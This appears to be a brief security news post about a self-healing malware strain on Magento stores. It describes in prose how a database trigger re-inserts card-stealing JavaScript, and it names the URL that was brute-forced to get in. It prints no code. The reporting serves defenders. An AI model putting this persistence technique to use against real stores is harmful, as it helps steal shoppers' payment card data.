A latest Self Healing malware targets Magento stores

Recently, Dutch malware experts have found a new malware strain that targets online shops running on the Magento which is one of the most popular e-commerce platform that can self-heal using code hidden in the website’s database.

How it works?

This malware starts execution whenever a user places a new order. When it occurs, a malicious database trigger (a set of automated SQL operations) executes before Magento puts together the PHP code and assembles the page. This database trigger checks if the malware’s malicious JavaScript code is present in the store’s header, footer, and copyright section. Additionally, it also checks various Magento CMS blocks where the malicious code could also reside.

If it doesn’t find any traces of its JavaScript code, the database trigger contains instructions that will re-insert it in the site’s source code, via a series of SQL operations.

Th malware affecting Magento stores that can steal user card information, which puts quite a lot of people at risk. The SQL part of the code, however, makes sure that the malware survives as long as possible on the platforms.

“The discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis,” de Groot writes.

You could scan a dump of your database and know whether it contains malicious stuff. But now, the actual malware is executed inside the DB,” de Groot said. He also added that “This is the first time I see malware written in SQL. Previously, malware was written in JS or PHP.”

Magento malware has its JS & PHP component that takes care of stealing user card information and interesting SQL part is to ensure the malware survives as much as possible.

“The malware got resilient against removal attempts and The malware attacks the DB instead of the e-commerce app”

This malware strain appears to infect databases following brute-force attacks on the /rss/catalog/notifystock/ URL, even on completely patched shops.

Leave a Reply

Your email address will not be published. Required fields are marked *